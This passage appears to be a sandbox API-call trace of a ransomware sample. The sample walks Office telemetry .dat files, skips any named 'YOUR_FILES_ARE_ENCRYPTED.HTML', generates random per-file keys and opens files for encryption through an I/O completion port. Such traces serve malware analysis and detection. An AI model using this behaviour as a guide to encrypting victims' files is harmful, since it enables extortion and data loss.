cAlternateFileName="{09178~1.DAT")) returned 1 [0111.436] StrStrIW (lpFirst="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.436] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat") returned 149 [0111.436] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat") returned=".dat" [0111.436] lstrlenW (lpString=".dat") returned 4 [0111.436] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat") returned=".dat" [0111.436] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{09178d66-ba92-4de3-b96c-2b24754031bf} (0) - 1840 - msaccess.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.437] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=849) returned 1 [0111.437] GetProcessHeap () returned 0x600000 [0111.437] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.439] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="E5") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="43") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="32") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="9E") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="8E") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="30") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="FC") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="BF") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="EB") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="12") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="7B") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="29") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="F5") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="0E") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="6A") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="00") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="07") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="34") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="9F") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="3B") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="67") returned 2 [0111.439] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="BD") returned 2 [0111.439] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="B4") returned 2 [0111.439] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="EE") returned 2 [0111.439] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="BF") returned 2 [0111.439] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="DC") returned 2 [0111.440] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="24") returned 2 [0111.440] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E1") returned 2 [0111.440] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="1B") returned 2 [0111.440] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="62") returned 2 [0111.440] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="81") returned 2 [0111.440] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="01") returned 2 [0111.440] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat" [0111.440] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.440] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.440] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbfebdca, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xcbfebdca, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfebdca, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTele.dat", cAlternateFileName="{09178~4.DAT")) returned 1 [0111.440] StrStrIW (lpFirst="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.440] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTele.dat") returned 139 [0111.440] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTele.dat") returned=".dat" [0111.440] lstrlenW (lpString=".dat") returned 4 [0111.440] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTele.dat") returned=".dat" [0111.440] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{09178d66-ba92-4de3-b96c-2b24754031bf} (1) - 1840 - msaccess.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.441] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=300) returned 1 [0111.441] CloseHandle (hObject=0x330) returned 1 [0111.441] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbfe96be, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xcbfe96be, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfeaa04, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x195, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTeleMediumCost.dat", cAlternateFileName="{09178~3.DAT")) returned 1 [0111.441] StrStrIW (lpFirst="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.441] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTeleMediumCost.dat") returned 149 [0111.441] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTeleMediumCost.dat") returned=".dat" [0111.441] lstrlenW (lpString=".dat") returned 4 [0111.441] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTeleMediumCost.dat") returned=".dat" [0111.441] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (1) - 1840 - msaccess.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{09178d66-ba92-4de3-b96c-2b24754031bf} (1) - 1840 - msaccess.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.441] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=405) returned 1 [0111.442] CloseHandle (hObject=0x330) returned 1 [0111.442] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba325b07, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xba325b07, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba325b07, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x11d, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTele.dat", cAlternateFileName="{4D44C~2.DAT")) returned 1 [0111.442] StrStrIW (lpFirst="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.442] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTele.dat") returned 138 [0111.442] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTele.dat") returned=".dat" [0111.442] lstrlenW (lpString=".dat") returned 4 [0111.442] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTele.dat") returned=".dat" [0111.442] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{4d44c03c-ceac-41b9-a9f9-31bd04be84b8} (0) - 540 - powerpnt.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.442] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=285) returned 1 [0111.442] CloseHandle (hObject=0x330) returned 1 [0111.442] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba325b07, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xba325b07, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba325b07, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x351, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat", cAlternateFileName="{4D44C~1.DAT")) returned 1 [0111.442] StrStrIW (lpFirst="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.442] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat") returned 148 [0111.442] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0111.442] lstrlenW (lpString=".dat") returned 4 [0111.442] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0111.442] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{4d44c03c-ceac-41b9-a9f9-31bd04be84b8} (0) - 540 - powerpnt.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.443] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=849) returned 1 [0111.443] GetProcessHeap () returned 0x600000 [0111.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.445] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="3E") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="FD") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="50") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="AA") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B9") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="BD") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="29") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="65") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="0E") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="2B") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="4B") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="43") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="F8") returned 2 [0111.445] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="43") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="62") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="03") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="48") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="ED") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="D4") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="EA") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="65") returned 2 [0111.446] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="FC") returned 2 [0111.446] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="F4") returned 2 [0111.446] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="CC") returned 2 [0111.446] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="19") returned 2 [0111.446] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="06") returned 2 [0111.446] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="8F") returned 2 [0111.446] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="F0") returned 2 [0111.446] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="63") returned 2 [0111.446] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="3D") returned 2 [0111.446] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="E7") returned 2 [0111.446] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="74") returned 2 [0111.446] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat" [0111.447] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.447] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.447] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba325b07, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xba325b07, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba325b07, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTele.dat", cAlternateFileName="{4D44C~4.DAT")) returned 1 [0111.447] StrStrIW (lpFirst="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.447] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTele.dat") returned 138 [0111.447] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTele.dat") returned=".dat" [0111.447] lstrlenW (lpString=".dat") returned 4 [0111.447] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTele.dat") returned=".dat" [0111.447] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{4d44c03c-ceac-41b9-a9f9-31bd04be84b8} (1) - 540 - powerpnt.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.448] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=300) returned 1 [0111.448] CloseHandle (hObject=0x318) returned 1 [0111.448] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba325b07, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xba325b07, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba325b07, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x195, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTeleMediumCost.dat", cAlternateFileName="{4D44C~3.DAT")) returned 1 [0111.448] StrStrIW (lpFirst="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.448] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTeleMediumCost.dat") returned 148 [0111.448] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0111.448] lstrlenW (lpString=".dat") returned 4 [0111.448] PathFindExtensionW (pszPath="{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0111.448] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (1) - 540 - powerpnt.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{4d44c03c-ceac-41b9-a9f9-31bd04be84b8} (1) - 540 - powerpnt.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.448] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=405) returned 1 [0111.448] CloseHandle (hObject=0x318) returned 1 [0111.448] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4b11db8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4b11db8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4b13100, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x11b, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTele.dat", cAlternateFileName="{530FA~2.DAT")) returned 1 [0111.448] StrStrIW (lpFirst="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.448] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTele.dat") returned 138 [0111.448] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTele.dat") returned=".dat" [0111.449] lstrlenW (lpString=".dat") returned 4 [0111.449] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTele.dat") returned=".dat" [0111.449] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{530fa225-a741-4103-8238-7b3d9de36f28} (0) - 3596 - winword.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.450] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=283) returned 1 [0111.450] CloseHandle (hObject=0x318) returned 1 [0111.450] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4b0e344, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4b0e344, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4b0f68f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, 